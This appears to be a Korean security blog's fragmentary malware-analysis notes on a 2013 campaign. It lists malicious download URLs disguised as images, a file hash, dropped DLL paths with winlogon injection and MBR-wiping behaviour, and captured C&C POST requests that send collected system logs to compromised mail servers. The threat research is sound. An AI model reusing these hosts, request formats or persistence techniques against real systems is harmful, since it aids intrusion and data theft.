https://www.facebook.com/cyberwar15
nalsee.com/scripts/blank_image.js
mb_join.gif
http://www.ewmail.net:32000/mail/skin/Xecureweb_update.gif
LGservc.exe
Xecureweb_update.gif (복호화된 pe)
ㄴwww.dobike.net/bbs/img/logo.jpg (pe) - ec887c65ed4b57ebcd535a3d065ec9eb
schedsrv.dll
sort.html 은 명령을 수신하는 C&C로도 사용되었으며, 공격자 명령에 따라 임시폴더에 ~09183.tmp 라는 파일을 받고, 조건에 의해서 MBR 파괴기능을 수행하였다.
날씨닷컴 등에 의해서 설치된 악성파일의 C&C
http://
http://
http://webmail.svenskawebb.se/
http://webmail.impulstanz.com/
http://
2013년 05월 31일에 발견된 정보수집 메일
http://mail.hallauto.com/mail/
http://
http://mail.ipsantarem.pt/
http://mailvault00.dothost.dk/
http://
POST /upload/2011122816281861_jsp.jsp?q=C0A81565189E005051CD2FD86B83D2C11D49FEDA12FD22;RQ9//5/uFk5jEaEd7mkJyJR8MiQzprGTCBgdyJ0Ac4bPjctwf4nCQilOQ1JmNVomGvRlKdMaybWUa7pFuHmt/3RDgY4Yu2%2BXM7RwpIkhSRk%3D%3Becs4%2BjpzBQj8FSM%2B4Clzk1pxWd4%3D HTTP/1.1
User-Agent: Molliza /4.0 (compatible; ******Web Ctl)
Host: www.icfc.or.kr
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: __utma=232969222.76267358.1370046134.1370046134.1370046134.1; __utmb=232969222.1.10.1370046134; __utmz=232969222.1370046134.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
생성 C:\Program Files\SoftForum\XecureWeb\ActiveX\temp\sxs.dll - 2013.05.30 03:54:37 UTC -> 05.30 12:54 KST
복사 C:\Program Files\Internet Explorer\sxs.dll
삭제 C:\Program Files\SoftForum\XecureWeb\ActiveX\temp\sxs.dll
파일 C:\Program Files\Internet Explorer\sxs.dll (MoveFileA)
변경 C:\Program Files\Internet Explorer\pbn.dll
sxs.dll 파일을 IE 폴더에 생성해서 IE 작동시까지 잠복기를 거치도록 만들고, 이후 추적할 수 있는 체인을 끊을 수 있다. sxs.dll 이 작동되면 icon_03.gif 악성파일이 설치되는데, 그 이후에 icon_03.gif 가 들어온 경로를 찾는게 어렵기 때문이다.
API 함수 암호화 0x04
다운 http://augustine.co.kr/bbs/img/icon_03.gif
생성 C:\Documents and Settings\user\Local Settings\Temp\kbdusv.exe - 2013.05.30 23:58:51 UTC -> 05.31 08:58 KST
생성 C:\Windows\System32\snddev.dll (winlogon.exe dll injection/handle) - 2013.05.29 15:48:05 UTC -> 05.30 24:48 KST
삭제 C:\Documents and Settings\user\Local Settings\Temp\kbdusv.exe
systeminfo.exe 을 통해서 로그생성
유출시도되는 로그는 임시폴더에 ~2469.tmp 와 같은 형식으로 만들어짐.
IP : 12.69.41.2 (mail.hallauto.com / 미국)
POST /mail/menu.html HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)
Host: mail.hallauto.com
Content-Length: 67
Connection: Keep-Alive
Cache-Control: no-cache
image=1&no=0&num=IC911A11&id=A5714183A8C0000000000000&date=dae965e6
-----------------------------6e8fad908fe13c
Content-Disposition: form-data; name="upfile"; filename="title.gif"
Content-Type: application/octet-stream
기존에 사용하던 Hash 값에서 변경이 되었다. 기존까지 주로 이용되던 값은 아래와 같다.
댓글0